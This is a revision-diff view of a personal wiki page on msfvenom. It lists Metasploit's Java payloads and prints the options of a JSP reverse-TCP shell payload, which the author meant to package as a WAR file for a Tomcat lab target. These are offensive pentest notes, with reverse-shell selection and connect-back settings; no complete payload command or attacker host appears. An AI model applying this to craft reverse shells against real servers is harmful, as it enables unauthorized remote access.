MSFVenom: Difference between revisions

From charlesreid1

No edit summary
Line 28: Line 28:
     java/shell/reverse_tcp                              Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
     java/shell/reverse_tcp                              Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
     java/shell_reverse_tcp                              Connect back to attacker and spawn a command shell
     java/shell_reverse_tcp                              Connect back to attacker and spawn a command shell
</pre>
Probably want to use <code>java/jsp_shell_reverse_tcp</code> or <code>java/meterpreter/reverse_tcp</code>.
===jsp shell reverse tcp===
Here are the options:
<pre>
root@morpheus:~/box/besside# msfvenom -p java/jsp_shell_reverse_tcp --payload-options
Options for payload/java/jsp_shell_reverse_tcp:
      Name: Java JSP Command Shell, Reverse TCP Inline
    Module: payload/java/jsp_shell_reverse_tcp
  Platform: Linux, OSX, Solaris, Unix, Windows
      Arch: java
Needs Admin: No
Total size: 0
      Rank: Normal
Provided by:
    sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
LHOST                  yes      The listen address
LPORT  4444            yes      The listen port
SHELL                  no        The system shell to use.
Description:
  Connect back to attacker and spawn a command shell
Advanced options for payload/java/jsp_shell_reverse_tcp:
    Name          : AutoRunScript
    Current Setting:
    Description    : A script to run automatically on session creation.
    Name          : InitialAutoRunScript
    Current Setting:
    Description    : An initial script to run on session creation (before
      AutoRunScript)
    Name          : ReverseAllowProxy
    Current Setting: false
    Description    : Allow reverse tcp even with Proxies specified. Connect back
      will NOT go through proxy but directly to LHOST
    Name          : ReverseConnectRetries
    Current Setting: 5
    Description    : The number of connection attempts to try before exiting the
      process
    Name          : ReverseListenerBindAddress
    Current Setting:
    Description    : The specific IP address to bind to on the local system
    Name          : ReverseListenerBindPort
    Current Setting:
    Description    : The port to bind to on the local system if different from LPORT
    Name          : ReverseListenerComm
    Current Setting:
    Description    : The specific communication channel to use for this listener
    Name          : ReverseListenerThreaded
    Current Setting: false
    Description    : Handle every connection in a new thread (experimental)
    Name          : VERBOSE
    Current Setting: false
    Description    : Enable detailed status messages
    Name          : WORKSPACE
    Current Setting:
    Description    : Specify the workspace for this module
Evasion options for payload/java/jsp_shell_reverse_tcp:
</pre>
</pre>

Revision as of 04:41, 30 March 2016

Can be used to craft payloads like remote tcp shells.

See this tool in action: Metasploitable/Apache/DAV

Creating Payloads

Tomcat

To create a WAR file that woudl give a reverse shell, I used msfvenom to generate the payload.

Started by listing all the different payloads available, so I could look for java-related payloads: 

root@morpheus:~/box/besside# msfvenom -l payloads

Framework Payloads (437 total)
==============================

    Name                                                Description
    ----                                                -----------
    java/jsp_shell_bind_tcp                             Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp                          Connect back to attacker and spawn a command shell
    java/meterpreter/bind_tcp                           Run a meterpreter server in Java. Listen for a connection
    java/meterpreter/reverse_http                       Run a meterpreter server in Java. Tunnel communication over HTTP
    java/meterpreter/reverse_https                      Run a meterpreter server in Java. Tunnel communication over HTTPS
    java/meterpreter/reverse_tcp                        Run a meterpreter server in Java. Connect back stager
    java/shell/bind_tcp                                 Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
    java/shell/reverse_tcp                              Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
    java/shell_reverse_tcp                              Connect back to attacker and spawn a command shell

Probably want to use java/jsp_shell_reverse_tcp or java/meterpreter/reverse_tcp.

jsp shell reverse tcp

Here are the options: 

root@morpheus:~/box/besside# msfvenom -p java/jsp_shell_reverse_tcp --payload-options
Options for payload/java/jsp_shell_reverse_tcp:


       Name: Java JSP Command Shell, Reverse TCP Inline
     Module: payload/java/jsp_shell_reverse_tcp
   Platform: Linux, OSX, Solaris, Unix, Windows
       Arch: java
Needs Admin: No
 Total size: 0
       Rank: Normal

Provided by:
    sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
SHELL                   no        The system shell to use.

Description:
  Connect back to attacker and spawn a command shell


Advanced options for payload/java/jsp_shell_reverse_tcp:

    Name           : AutoRunScript
    Current Setting:
    Description    : A script to run automatically on session creation.

    Name           : InitialAutoRunScript
    Current Setting:
    Description    : An initial script to run on session creation (before
       AutoRunScript)

    Name           : ReverseAllowProxy
    Current Setting: false
    Description    : Allow reverse tcp even with Proxies specified. Connect back
       will NOT go through proxy but directly to LHOST

    Name           : ReverseConnectRetries
    Current Setting: 5
    Description    : The number of connection attempts to try before exiting the
       process

    Name           : ReverseListenerBindAddress
    Current Setting:
    Description    : The specific IP address to bind to on the local system

    Name           : ReverseListenerBindPort
    Current Setting:
    Description    : The port to bind to on the local system if different from LPORT

    Name           : ReverseListenerComm
    Current Setting:
    Description    : The specific communication channel to use for this listener

    Name           : ReverseListenerThreaded
    Current Setting: false
    Description    : Handle every connection in a new thread (experimental)

    Name           : VERBOSE
    Current Setting: false
    Description    : Enable detailed status messages

    Name           : WORKSPACE
    Current Setting:
    Description    : Specify the workspace for this module

Evasion options for payload/java/jsp_shell_reverse_tcp:
Retrieved from "https://charlesreid1.com/w/index.php?title=MSFVenom&oldid=10123"